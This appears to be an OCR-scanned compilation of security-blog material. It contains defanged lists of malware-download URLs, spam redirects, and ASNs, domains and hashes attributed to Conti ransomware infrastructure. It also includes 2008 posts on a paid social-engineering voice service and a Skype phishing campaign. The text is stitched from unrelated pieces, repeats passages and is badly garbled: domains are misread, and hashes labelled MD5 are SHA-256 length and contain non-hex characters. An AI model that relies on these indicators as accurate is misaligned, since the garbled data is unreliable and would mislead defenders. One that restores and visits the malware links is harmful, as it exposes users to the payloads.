hxxp://onstantsal[.]ecolinkshop[.]ru/kinoroom _browser|[.]exe?etag=de06b458325a56ee34e93- 
4414c5acd79 


hxxp://ontagna[.]eco-link-shop[.]ru/2inf _autorun[.]exe?etag=045effa3637f992838960- 
7add49dce58 

hxxp://ontagna[.]Jeco-link-shop[.]ru/2inf _autorun[.]exe?etag=fd45134da8beed49dd288- 
5b118591laba 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _autorun[.]exe?etag=fe05f5bf632cc1b788047- 
1e5852fa79c 

hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _favorites[.]exe?etag=045effa3637f9928389- 
607add49dce58 

hxxp://ontagnal[.]eco-link-shop[.]ru/2inf _favorites[.]exe?etag=fd45134da8beed49dd2- 
885b118591laba 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _icon[.]exe?etag=045effa3637f9928389607ad- 
d49dce58 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _icon[.]exe?etag=fd45134da8beed49dd2885b1- 
18591laba 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _launch[.]exe?etag=045effa3637f9928389607- 
add49dce58 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _launch[.Jexe?etag=fd45134da8beed49dd2885- 
b118591laba 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _launch[.]exe?etag=fe05f5bf632cc1b7880471- 
e5852fa79c 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _pinnedtabs[.]lexe?etag=045effa3637f992838- 
9607add49dce58 

hxxp://ontagna[.]eco-link-shop[.]ru/2inf _pinnedtabs[.]exe?etag=fe05f5bf632cc1b788- 
0471e5852fa79c 
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hxxp://ontagna[.]eco-link-shop[.]ru/2inf shortcutmaker [.]ico 
hxxp://ontagna[.]eco-link-shop[.]ru/2inf speaddial[.]png 


hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _speeddiall[.]exe?etag=045effa3637f9928389- 
607add49dce58 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _speeddiall[.Jexe?etag=fe05f5bf632cc1b7880- 
471e5852fa79c 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _Startlink[.]exe?etag=045effa3637f9928389- 
607add49dce58 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _Startlink[.]exe?etag=fd45134da8beed49dd2- 
885b118591laba 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _Startlink[.]exe?etag=fe05f5bf632cc1b7880- 
471e5852fa79c 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=045effa3637f9928389- 
607add49dce58 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=fd45134da8beed49dd2- 
885b118591laba 
hxxp://ontagna[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=fe05f5bf632cc1b7880- 
471e5852fa79c 


hxxp://ontagna[.]eco-link-shop[.]ru/go search _desktop[.]Jexe?etag=045effa3637f992838960- 
7add49dce58 


hxxp://ontagna[.]Jeco-link-shop[.]ru/go_ search _desktop|[.]lexe?etag=fd45134da8beed49dd288- 
5b118591aba 


hxxp://ontagna[.]eco-link-shop[.]ru/go search desktop[.]exe?etag=fe05f5bf632cc1b788047- 
1e5852fa79c 


hxxp://ontagna[.]eco-link-shop[.]ru/go search _taskbar[.]Jexe?etag=045effa3637f992838960- 
7add49dce58 


hxxp://ontagna[.]eco-link-shop[.]ru/go search _taskbar[.Jexe?etag=fd45134da8beed49dd288- 
5b118591aba 


hxxp://ontagna[.]eco-link-shop[.]ru/go _search _taskbar[.]exe?etag=fe05f5bf632cc1b788047- 
1e5852fa79c 


hxxp://ontagna[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=045effa3637f9928389607add- 
49dce58 


hxxp://ontagna[.]eco-link-shop[.]ru/goinf_plugin_cis[.Jexe?etag=0f764fe1567cd197111900946- 
bfccced 


hxxp://ontagna[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=10311ae635a2cab64ad8285f7- 
4242f03 


hxxp://ontagna[.]eco-link-shop[.]ru/goinf_ plugin _cis[.Jexe?etag=1ab098b35d86ebf15e73d119a- 
153438c 


hxxp://ontagna[.]eco-link-shop[.]ru/goinf_ plugin _cis[.Jexe?etag=25f231357f45e7003c4c09475- 
b031832 


hxxp://ontagna[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=350dcacb989378d0192d0b149- 
b3d6cdb 
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bloglines .com/blog/jennyuxe85 
bloglines .com/blog/wilkersonin 
bloglines .com/blog/nicolasqydby 
bloglines .com/blog/darbyeve 
bloglines .com/blog/izaiahro83 
bloglines .com/blog/parsonsdos 
bloglines .com/blog/fullerjeb81 


Abusing legitimate services may indeed get more attention in the upcoming year, follow- 
ing their interest in the practice from the last quarter. 


1. http: //ddanchev. blogspot . com/2008/12/dissecting-koobface-worms- december . htm 
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The following is a brief summary of all of my posts at [1]Zero Day for November. You can also 
go through previous summaries for [2]October, [3]September, [4]August and [5]July, as well 
as subscribe to my [6]personal RSS feed or [7]Zero Day’s main feed. Thanks for being with us. 


Some notable articles for November include [8]Black market for zero day vulnerabilities 
still thriving; [9]Anti fraud site hit by a DDoS attack and [10]Cybercriminals release Christmas 
themed web malware exploitation kit. 


01. [11]Black market for zero day vulnerabilities still thriving 

02. [12]Google and T-Mobile push patch for Android security flaw 

03. [13]Fake WordPress site distributing backdoored release 

04. [14]Koobface Facebook worm still spreading 

05. [15]Cyber terrorists to face death penalty in Pakistan 

06. [16]AVG and Rising signatures update detects Windows files as malware 
07. [17]BBC hit by a DDoS attack 

08. [18]Google fixes critical XSS vulnerability 

09. [19] $10k hacking contest announced 

10. [20]Anti fraud site hit by a DDoS attack 

11. [21]Commercial vendor of spyware under legal fire 

12. [22]Fake Windows XP activation trojan goes 2.0 

13. [23]Cybercriminals release Christmas themed web malware exploitation kit 


1. http: //blogs.zdnet.com/securit 


. http: //ddanchev. blogspot .com/2008/11/summarizing-zero-days-posts-for-october.htm 


= 


. http: //ddanchev. blogspot .com/2008/10/summarizing-zero-days-posts-for.htm 


. http: //ddanchev. blogspot .com/2008/09/summarizing-zero-days-posts-for-august. htm 


2 
3 
4 
5. http: //ddanchev. blogspot .com/2008/08/summarizing-zero-days-posts-for-july.htm 
6. http: //updates.zdnet.com/tags/danchot+danchev .htm1?t=0&s=0é0=1&émode=rss 
7 
8 
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| 

| 
10. 
11. http://blogs.zdnet .com/security/?p=2108 
12. 
13 
14. http://blogs.zdnet .com/security/?p=2146 
15. 
16. http://blogs.zdnet .com/security/?p=2158 
17 
18. http://blogs.zdnet .com/security/?p=2169 
16. 
20. http://blogs.zdnet .com/security/?p=2188 
21 
22. http://blogs.zdnet .com/security/?p=2201 
23. http://blogs.zdnet .com/security/?p=221 
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If | were to come across this service last year, I’d be very surprised. But coming across it in 
2008 isn’t surprising at all, and that’s the disturbing part. 


Following the ongoing trend of localizing cybercrime ([1]Localizing Cybercrime - Cultural 
Diversity on Demand; [2]Localizing Cybercrime - Cultural Diversity on Demand Part Two) a new 
service takes the concept further by introducing a multilingual on demand social engineering 
service especially targeting scammers and fraudsters that are unable to "properly scam an 
international financial institution" due to the language limitations. What is the service all 
about? Currently offering to "talk cybercrime on behalf of you", the service is charging $9 for 
a call with increased use of it leading to the usual price discounts falling to $6 per call. The 
languages covered and the male/female voices available are as follows : 


- English (3 male voices and 2 female ones) 
- German (2 male voices and 1 female one) 
- Spanish (1 male voice and 2 female ones) 
- Italian (1 male voice and 1 female one) 
- French (1 male voice and 1 female one) 


If the service was only advertising male or female English voices, I’d suspect it of being 
run by a single individual using a commercial voice changer application, however, due to 
the fact that it’s currently offering male and female voices in 5 languages, there’s a great 
chance that these are in fact separate people they’re working with. The ugly part is that the 
whole business model is very well thought of in the sense that given that fact that certain 
banks or online services can automatically freeze the assets to which the cybercriminal has 
access to, the service, through its multilingual capabilities can indeed convince the institution 
in the authenticity of the Spanish caller that’s indeed Spanish based on the stolen personal 
information provided by the cybercriminal in the first place. 


Where’s the trade-off for cybercriminals? They would have to very specific in order for 
the service to work, meaning, they would have to use it as a intermediary by sharing data 
regarding compromised banking accounts, expected courier deliveries obtained through 
fraudulent means (stolen credit card details), and the service reserves the right not to work 
with them. Consequently, the people working with the service easily act as the weakest link 
in the process of exposing ongoing cybercrime or real-life crime activities, and compared to 
plain [3]simple localization in the sense of translation services, the real nature of the type of 
conversations and impersonation happening through this one should be pretty obvious to the 
people offering their natural cultural diversity and voices for sale. 


Despite that monetizing social engineering is not new, monetizing (accomplice) voices, 
and running a social engineering ring definitely is. 
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4.12.8 Localized Social Engineering on Demand (2008-12-15 15:47) 


If | were to come aross this service last year, I’d be very surprised. But coming across it in 
2008 isn’t surprising at all, and that’s the disturbing part. 


Following the ongoing trend of localizing cybercrime ([1]Localizing Cybercrime - Cultural 
Diversity on Demand; [2]Localizing Cybercrime - Cultural Diversity on Demand Part Two) a new 
service takes the concept further by introducing a multilingual on demand social engineering 
service especially targeting scammers and fraudsters that are unable to "properly scam an 
international financial institution" due to the language limitations. What is the service all 
about? Currently offering to "talk cybercrime on behalf of you", the service is charging $9 for 
a call with increased use of it leading to the usual price discounts falling to $6 per call. The 
languages covered and the male/female voices available are as follows : 


- English (3 male voices and 2 female ones) 
- German (2 male voices and 1 female one) 
- Spanish (1 male voice and 2 female ones) 
- Italian (1 male voice and 1 female one) 
- French (1 male voice and 1 female one) 


If the service was only advertising male or female English voices, I’d suspect it of being 
run by a single individual using a commercial voice changer application, however, due to 
the fact that it’s currently offering male and female voices in 5 languages, there’s a great 
chance that these are in fact separate people they’re working with. The ugly part is that the 
whole business model is very well thought of in the sense that given that fact that certain 
banks or online services can automatically freeze the assets to which the cybercriminal has 
access to, the service, through its multilingual capabilities can indeed convince the institution 
in the authenticity of the Spanish caller that’s indeed Spanish based on the stolen personal 
information provided by the cybercriminal in the first place. 


Where's the trade-off for cybercriminals? They would have to very specific in order for 
the service to work, meaning, they would have to use it as a intermediary by sharing data 
regarding compromised banking accounts, expected courier deliveries obtained through 
fraudulent means (stolen credit card details), and the service reserves the right not to work 
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hxxp://wwwl.]yuzuki-ph[.]jp/ysearch/rank[. ]php?mode=link &id=3327 
&url=hxxp://ljc[. Jauctions2018[.]homelinux[.]com/ 


hxxp://www[. ]zhouyiworld[.]Jcom/home/link[.]php?url=hxxp://far[. Jastra[.]Jcloudns[.]cx/ 


hxxp://www[.]zoohoo[.]cz/redir[.]Jphp?q=gpc &url=hxxp://ahx[.]mamashoping[.]cloudns[.- 
]cx/sitemap[. ]txt 


hxxp://www[.]zoohoo[. ]ro/redir[.]php?q=ister &url=hxxp://ibn[.]kladtv[.]com/ 


hxxp://www[.]zrxoa[.]org/OpenAds/adclick[.]php?bannerid=4 &zoneid1 &source= 
&dest=hxxp://vyb[.]greatonlinestore[.Jonl ine/ 


hxxp://www[.]zuerisee[.]ch/adclick[.]php?id=36 &url=hxxp://ajs[.]mamashoping[.]cloudns[.- 
]cx/ 


hxxp://wxv[.Jastra[.]cloudns[.]cx/ 

hxxp://xav[.]Jauctions2018[.]dnsalias[.]net/ 

hxxp://xbg[.]astra[.]cloudns[.]cx/ 

hxxp://xcinfo[. ]}webs24[. ]ru/redir[.]ohp?url=hxxp://wxv[. Jas tra[.]Jcloudns[.]cx/ 
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hxxp://xcq[.]smartwritingservice[.]4pu[.]com/topic/1/essay/73/ 
hxxp://xcy[.Jastra[.]Jcloudns[.]cx/ 
hxxp://xdy[.Jauctions2000[.]myphotos[.]cc/ 


hxxp://xfordshi[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=a4f53327135ac5fc8ccObde23- 
efd1787 


hxxp://xfordshi[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=d0b255b974e5305813d461819- 
b7f859f 


hxxp://xfun[.]cc/kcupcoffeestarbucks858671 
hxxp://xhi[.]smartwritingservice[.]4pu[.]com/article/1/essay/47/ 
hxxp://xhn[.]alinashop[.]ddns[.]info/supershop/2017113/kia-moto rs-accessories[.]html 
hxxp://xja[.]goldenshopone[. ]from-ca[.]com/ 

hxxp://xke[.]goldenshopone[. ]from-cal[.]com/ 

hxxp://xI[.]css[.]derp-cdn[.]com/ 

hxxp://xlw[.]goldenshopone[.]from-ca[.]com/ 

hxxp://xno[.]astra[.]cloudns[.]cx/ 


hxxp://xpressa[.Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=3397f295626e42d77ded80b8b- 
3e43fee 


hxxp://xpressa[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=6c494b0527b7598d78al1f3- 
62266c5017 
hxxp://xpressal[.]ecolinkshop[. ]ru/goinf _plugin[.]exe?etag=b5cdcfca4ee1460e2dbef0- 
elaaea0b37 


hxxp://xrn[.Jauctions2018[.]homelinux[. ]net/ 
hxxp://xsk[.]greatonlinestore[.]online/ 
hxxp://xsl[.]smartwritingservice[.]4pu[.]com/topic/1/paper/23/ 
hxxp://xsp[.]css[.]derp-cdn[.]com/ 

hxxp://xsx[.]hoff[. ]life/description[.]php?id=263427281626 
hxxp://xtreamer[.]oneshop[.]getmyip[.]com/topic/1/53 
hxxp://xxs[.]yt/ariadiscountcode248214 
hxxp://xzc[.Jauctions2000[.]myphotos[.]cc/ 


hxxp://yamanashil.]fudousan[.]co[.]jp/link[. ]Johp?url=hxxp:/ /tkm[.Jauctions2018[.]homel- 
inux[.]com/ 


hxxp://ydc[.]goldenshopone[.]from-ca[.]com/ 


hxxp://yderabal[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=b61e2c7e39df3032ed0167e71- 
911la6b1 


hxxp://ydrochari[.]eco-link-shop[. ]ru/goinf _plugin[.]exe?etag=aea68d4e9cb4d8e8e2f660- 
abe8f24339 


hxxp://ydrochari[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=8225c50e1fc58985288ea965a- 
218bf05 
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hxxp://ydrocho[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=27b378d7426e2a17bc3ac0- 
d569698929 


hxxp://ydrogeologil[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=38126c43b826b9ea3a88b1741- 
df1b090 


hxxp://ydrogeologil[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=457f34e8a3cc50527ee198ebd- 
44be4d3 


hxxp://ydrogeologil[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=408b812ce4dcf02fef3e13- 
de39ca39al 


hxxp://ydrogeologi[.]ecolinkshop[.]ru/goinf _plugin[.lexe?etag=7d2095325af57024f31405- 
787cle7fc7 


hxxp://ydrosei[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=58a7aeb4c2a763994f967a237- 
507bdda 


hxxp://yej[. Jauctions2018[.]homelinux[.]com/ 


hxxp://yelorussia[.]ecolinkshop[.]ru/goinf plugin _cis[.]exe?etag=be56f5d2b98b29794ab3aad48- 
bf3b476 


hxxp://yes[.]smartwritingservice[.]4pu[.]com/article/1/paper/24/ 
hxxp://yfr[. ]goldenshopone[.]from-ca[.]com/?mobileview=off 


hxxp://yfv[.]smartwritingservice[.]4pu[.]com/article/2017 71/which-theme-is-communicated- 
by-george-herbert’s-poem-heaven/ 


hxxp://yfv[.]smartwritingservice[.]4pu[.]com/review/20171217/a-ma rket-failure-occurs-when- 
a-free-market-is-unable-to/ 


hxxp://yht[. ]megav[.]wikaba[.]com/ 


hxxp://yic[. ]smartwritingservice[.]4pu[.]com/article/20171126/w hat-does-foreshadowing- 
mean/ 


hxxp://yic[. ]smartwritingservice[.]4pu[.]com/essay/20171128/from- _the-roaring-twenties-to- 
the-depression-essay 


hxxp://yic[. ]smartwritingservice[.]4pu[.]com/review/2017128/essay -on-struggles-of-a-blank- 
canvas/ 


hxxp://yic[. smartwritingservice[.]4pu[.]com/review/201721/what-e vent-or-events-mainly- 
caused-the-fall-of-the-british-empire 


hxxp://yiz[. ]smartwritingservice[.]4pu[.]com/article/1/paper/30/ 


hxxp://ylocichla[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=c7f6ad9d52c3376a8bc733- 
6ebdd33dbd 


hxxp://ylocichla[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=e05dba69ed70c1dd0f7b90977- 
fdda8cl 


hxxp://ylocichla[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=ea00d2f9d3d7d82bb7b982c65- 
aa01d89 


hxxp://ylocichla[.Jecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=d4e589562eee384637f4c9e85- 
ce1b203 


hxxp://ynil.]goldenshopone[.]from-ca[.]com/ 
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hxxp://ynoscio[.]ecolinkshop[. ]ru/goinf _plugin[.]lexe?etag=8805ec25f5222a4bd7f424- 
7021725e6d 


hxxp://yom[.]auctions2000[.]myphotos[.]cc/ 
hxxp://you[.]oneshop[.]getmyip[.]com/review/3/58 


hxxp://yprinida[.]eco-link-shop[. ]ru/goinf _plugin[.]exe?etag=82455aeeb4bb73023c377f- 
A4f7cbf9196 


hxxp://yqd[.]smartwritingservice[.]4pu[.]com/essay/1/paper/86/ 
hxxp://yrd[.]smartwritingservice[.]4pu[.]com/review/1/paper/60/ 


hxxp://ysodonta[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=c8385b8247dff551da6d33- 
eb4f27b908 


hxxp://ysodonta[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=ca0f2365b8c33afeea548a- 
2d42b4d654 


hxxp://ystoidea[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=4c00cd6b04ec567a71ff10- 
a15a856931 


hxxp://ystoidea[.]Jecolink24[.]ru/ 


hxxp://ystoidea[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=65b8a89f864cfd8f2e60d2- 
f85fea0270 


hxxp://yua[.]goldenshopone[.]from-ca[.]com/ 
hxxp://yuv[.]smartwritingservice[.]4pu[.]com/free-essays/1/essay/ 69/ 
hxxp://yxs[.]goldenshopone[. ]from-ca[.]com/ 
hxxp://yyi[.]smartwritingservice[.]4pu[.]com/article/1/paper/87/ 
hxxp://zbn[.]smartwritingservice[.]4pu[.]com/article/1/paper/50 / 
hxxp://zdp[.]smartwritingservice[.]4pu[.]com/article/1/paper/66/ 
hxxp://zfh[. Jauctions2018[.]dnsalias[.]net/ 
hxxp://zfn[.]smartwritingservice[.]4pu[.]com/article/1/essay/50 / 
hxxp://zgf[.]smartwritingservice[.]4pu[.]com/free-essays/1/essay/ 61/ 
hxxp://zhangxiaobin8848[.]xyz 

hxxp://zhangxiaobin8848[.]xyz 
hxxp://zld[.]Jgoldenshopone[.]from-ca[.]com/ 
hxxp://zog[.]smartwritingservice[.]4pu[.]com/review/1/paper/70/ 


hxxp://zpc[.]smartwritingservice[.]4pu[.]com/review/2017215/acc ording-to-keynes-what- 
households-plan-to-save/ 


hxxp://zrc[.]zend[.]4pu[.]com/ 
hxxp://zuk[.]deadlines[.]4pu[.]com/ 
hxxp://zuk[.]deadlines[.]4pu[.]com/essay/5/essay/29/ 
hxxp://zxg[.]uoancorp[. ]life/ 


hxxp://zzr[.]smartwritingservice[.]4pu[.]com/essay/2017118/in-a_ n-indirect-democracy-major- 
laws-and-rules-are-made-by/ 
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hxxp://zzr[. ]smartwritingservice[.]4pu[.]com/essay/20171216/essay -about-the-civil-rights- 
movement-in-1955/ 


hxxp://zzr[. ]smartwritingservice[.]4pu[.]com/review/2017415/candi de’s-growth-essay/ 


Related ASs known to have been used by the Conti ransomware gang’s Internet connected 
infrastructure include: 


AS45671 
AS22612 
AS39798 
AS8708 
AS51395 
AS61272 
AS39378 
AS3320 
AS213354 
AS49505 
AS35913 
AS30475 
AS46664 
AS45905 
AS33911 
AS61046 
AS7922 
AS4134 
AS21100 
AS30036 
AS209 
AS49981 
AS9829 
AS22773 
AS204957 
AS61138 
AS16509 
AS15169 
AS60781 
AS207408 
AS41231 
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campaigns serving old school VBS scripts has become an inseparable part of my daily routine. 


| really enjoyed the fact that since then you’ve changed your email address from ikba- 
man@gmail.com to ikbasoft@gmail.com and due to its descriptive nature speaking for a 
software company set up, | can only envy your profitability. However, due to the tough 
economic times, your latest round of blended with malware phishing emails has to go down. 
I’m sure you'd understand, as it only took "[2]5 minutes out of my online experience" to notice 
you, and so I’m no longer interested in processing the /service-peyment/ that you require on 
the majority of brandjacked subdomains that you keep creating at the very same ns8-wistee.fr. 


secureskype.uuuq .com redirects to monybokers.ns8-wistee .fr/skype/cgi- 
bin/us/security/update-skype/service-peyment/update/login.aspx/in dex.htmls where the 
VBS is pushed, with its detection rate prone to improve. 


1. http: //ddanchev. blogspot .com/2008/05/skype-phishing-pages-serving-exploits.htm 
2. http: //ddanchev. blogspot .com/2008/05/skype-phishing-pages-serving-exploits.htm 


4.12.10 Cyber Jihadists part of the GIMF Busted (2008-12-17 20:21) 
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AS62068 
AS204490 
AS54290 
AS55154 
AS12271 
AS50340 
AS11427 
AS31400 
AS36352 
AS52000 
AS16276 
AS39020 
AS56630 
AS201106 
AS24940 
AS56694 
AS19624 
AS12722 
AS62240 
AS50955 
AS50979 
AS34224 
AS8075 
AS9009 
AS10439 
AS7155 
AS213373 
AS64236 
AS10796 
AS60117 
AS36935 
AS59729 
AS701 
AS399629 


AS6128 
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AS35048 

AS51852 

AS60404 

AS14061 

AS174 

AS58329 

AS577 

AS20473 

AS11556 

AS46261 

Related Conti ransomware gang MD5s known to have been involved in the campaign: 
c5736bfalle7decaf5f7fe050b64d8cfd04bb80ec6f238512009ffcbb48856ca 
d030d878c51273d2ca64ce8b4b75f24cdb64b085febd8el5ea766df3e6feb3db 
00505315d1c6a3fb48dc7b2befb426e5d5c194073088754cd041268d5384b4al 
5aacb74b563f8e7ce7f8fac08416fc11e636f334c1c603981c2bf1a5c692d38b 
43ed009e83378c0b24d0b71ef479efbb5da7a074fe7d38916f0caa6e0a34cd84 
4d36106df69095ef5bd325e3e7857fe9004eb1d4cdfaeNad9d7845fefle7e981 
b3cd6afdfe41cba0274c7f8eeeb1bb2144ece26796f6c968893130a6599a09a2 
34fced20fd7d43fb4c8216e0bae2b55b441 9f6d68fe4f5248eb4fal96d1d9e50 
d0e8423c380elee16d67d3d29e9ad24ae940b755a5fc5d262f96bfO1lelcda54c 
8fbe54badf90alfod88de83b3e56baa92a8610a82fc74ff11631la2dece5b19a0 
9283842b577652ea6a99fa4991ab1f2b9973d2f8d10f9f63cf2ecbdb92f37a0b 
66be8d0ff5733c4a61b6e3f7dd72c0d47c5bb91a3c935b8e23f44d349b83a65b 
34864e8a46ae6a81159dc6b603e016b806c913675dcee9589092ee606671e4c7 
cb14cfdelal3ff2af4e59b91led9dca3bb0e024dd24cd671271fe98da8dd16b48 
133fe38f0f690300a7327a264585c289f83a37c2050f68f0af12c21d61ba6d63 
55465296b370c17961a82574ab8d98752657cbb3af20c0ad47802d12de50b519 
051e659236887414af9298c49d8c56c4a7e015599d2671768fc92904a78aaf8e 
7dd6bd5e242a710c1ebc3122298c62adb46574960d147af588d9b37e204bebb3 
3b186ac50c5dcd366e3a553ba2aab6d945b2478a0d1018149274419246f94acf 
514d739ef92e844a370bc555e0f56381f1301992908aab936038a7a7b65f2472 
08d77b7d2d7842c47645d97f252bb2d4ea6f76e94b53a4a092fef97ae4343858 
f556f38690b8b551ec8215bc38d2d1fc02895acf9ff54f9fal40ae568d296dfe 
619461c713124e503137bd2f6db01920ef71354d323073f3b04b714fc35c5a8a 


6098f7a363c450b76fdle268ffb38c2e5ce4312e00b84959b27cd1753bca93ac 
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03abad346c58d3670d064e5f61595367ef393f0a70ee933c21ad8b45fe37d84b 
ded87a28e363aab37f0el6df7aal5f5283dcec118eae798ca3a971672dfa27f9 
Odf514bcd1220062d70f1697 2cffOf79a0d94992c71376213992e4ded95285b3 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


03456[.]net 
148bd4fal[.]micro1[.]Jinbox[.]Jland 
148bd4fal.]micro3[.]Jinbox[.]land 
16648[.]css[.]derp-cdn[.]com 
17486[.]ns1[.]baiduyun-update[. ]live 
17486[.]ns2[.]baiduyun-updatef[. ]live 
195-123-214-177[.]cprapid[.]com 
1ldcmailsend[. ]cf 
1sco-ssecrevrfy[.]com 
2194092094029101[.]hopto[. Jorg 
23849238498[. ]tk 
2393datasw2[.]xyz 
2849829148218492[.]ddns[.]net 
2858c4b2[.]microl1[.]inbox[.]Jland 
2858c4b2[.]micro2[.]inbox[.]Jland 
2858c4b2[.]micro3[.]inbox[.]Jland 
294012985932598981[.]ddns[.]net 
2vpn[.]net 
44093[.]ns1[.]baiduyun-update[. ]live 
44093[.]ns2[.]baiduyun-updatef[. ]live 
52dswl[.]club 
57263[.]g1[.]Jimgbox[.]site 
57263[.]g2[.]imgbox[.]site 
8g4abqr2n2j8fjdk[.]myfritz[.]net 
al3[.]vifes[.]bid 
aaa[.]zzkyasd[.]Jcom 
aal[.]mamashoping[.]cloudns[.]cx 
aasfhhvyyayssal[.]xyz 
abe[.]mamashoping[.]cloudns[.]cx 
abw[.]mamashoping[.]cloudns[.]cx 
acchanalia[.]Jecolink24[.]ru 
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acchionial[.]ecolink24[.]ru 
account-updata[.]amazno[.]buzz 
accounts[.]auto[.]sc[.Jout24[.]handler98571[.]han395[. ]xyz 
accounts[.]auto[.]sc[.Jout[.]s24[.]handler69037[.]p ri082[.]xyz 
accounts[.]auto[.]sco[.]ut24[.]handler89301[.]ssl-309[. ]xyz 
accounts[.]Jautosc[.Jout24[.]handler38914[. ]Jusr720[.]xyz 
accounts[.]Jautosc[.Jout24[.]handler84703[.]mod61[.]xyz 
accounts[.]login[.]verified-link[.]com 

accountsauto[. ]scout24[.]handler26801[.]sec093[.]xyz 
acedonia[.]Jecolink24[.]ru 

acrorhampho[.]Jecolink24[.]ru 

addingto[.]Jecolink24[.]ru 
adi[.]Jmamashoping[.]cloudns[.]cx 

admin[.]iticket[.]md 

adminl[.]nticket[.]md 

administrator[. Jiticket[.]md 

adozhsko[.]ecolink24[.]ru 
adq[.]Jmamashoping[.]cloudns[.]cx 
aedalia[.Jecolink24[.]ru 
aej[.]mamashoping[.]cloudns[.]cx 
aem[.]mamashoping[.]cloudns[.]cx 
aesarea[.]Jecolink24[.]ru 
afn[.]mamashoping[.]cloudns[.]cx 
afo[.]Jmamashoping[.]cloudns[.]cx 
agatogo[.]ecolinkshop[.]ru 

agcopho[. Jecolink24[.]ru 

agellani[.]ecolink24[.]ru 

agersto[.Jecolink24[.Jru 

agersto[.]ecolinkshop[. ]ru 

agnapla[.]Jeco-link-shop[.]ru 

agnaplal[.Jecolink24[.]ru 

agneheli[.Jeco-link-shop[.]ru 

agneheli[.Jecolink24[.]ru 

agneheli[.Jecolinkshop[.]ru 

agnitogo[.]ecolink24[.]ru 
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agr[.]mamashoping[.]cloudns[.]cx 
aha[.]mamashoping[.]cloudns[.]cx 
aig[. ]mamashoping[.]cloudns[.]cx 
aim[.]mamashoping[.]cloudns[.]cx 
ainozoil[.Jecolink24[.]ru 
ainozoi[.]ecolinkshop[. ]ru 
aisleyi[.]eco-link-shop[.]ru 
aisleyi[.Jecolink24[.]ru 
aisleyi[.Jecolinkshop[. ]ru 
ajn[.]mamashoping[.]cloudns[. ]cx 
ajorana[.]Jecolink24[.]ru 
ajustes[. ]digital 
akersfi[.]ecolinkshop[.]ru 
akhachkala[.]eco-link-shop[. Jru 
akhachkalal[.]ecolink24[.]ru 
alaclaval[.Jecolink24[.]ru 
alamariacea[.]ecolink24[.]ru 
alaskagova[.]com 
alaysia[.Jecolink24[.Jru 
aleolithi[.Jecolink24[.]ru 
aleopsi[.]ecolink24[.]ru 
aleozoil.Jecolink24[.]ru 
alevala[.Jecolink24[.]ru 
aliburto[.Jecolink24[.Jru 
alimanta[.]eco-link-shop[. ]ru 
alimantal[.]Jecolink24[.]ru 
alliburto[.]ecolink24[.]ru 
alydonial[.]Jecolinkshop[. ]ru 
amazno[.]buzz 
amazon-oc[.]Jcam 
amazon-updata[.]buzz 
amazon-updata[.]co[. ]jp[.]Jc417ce26d4ce7a52a5fc2el195ic9o0boae70bcr e[.]buzz 
amelina[.Jeco-link-shop[.]ru 
amelina[.Jecolinkshop[.]ru 
amiltonia[.Jecolinkshop[.]ru 
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ampstea[.]eco-link-shop[.]ru 
anadizi[.Jecolinkshop[.]ru 
anamania[.]eco-link-shop[.]ru 
anamania[.]ecolinkshop[.]ru 
anarkshi[.]eco-link-shop[.]ru 
anarkshi[.]Jecolinkshop[. ]ru 
anberra[.]Jeco-link-shop[.]ru 
anberra[.]Jecolinkshop[.]ru 
andelbro[.Jeco-link-shop[.]ru 
andesbal[.]eco-link-shop[.]ru 
andesbal[.]Jecolinkshop[. ]ru 
android[.]I[.]google[.]Jcom 
andstei[.]ecolink24[.]ru 
anffshi[.]ecolinkshop[.]ru 
angladeshi[.]eco-link-shop[. Jru 
angladeshi[.]ecolinkshop[. ]ru 
anichaea[.]Jecolinkshop[. ]ru 
anoveria[.]ecolinkshop[.]ru 
ansardi[.]Jeco-link-shop[.]ru 
antuaria[.]eco-link-shop[.]ru 
antuaria[.]Jecolinkshop[.]ru 
api[.]Jcharmhub[.]io 
api[.]snapcraft[.]io 
aplacia[.]Jeco-link-shop[.]ru 
aplacia[.Jecolinkshop[. ]ru 
apoleoni[.]Jeco-link-shop[.]ru 
apoleoni[.Jecolinkshop[.]ru 
apsella[.Jecolinkshop[.]ru 
agqacidom[.]com 
araguaya[.]eco-link-shop[.]ru 
aralitho[.]ecolinkshop[.]ru 
aramanco[.]ecolinkshop[.]ru 
aramaribo[.]eco-link-shop[.]ru 
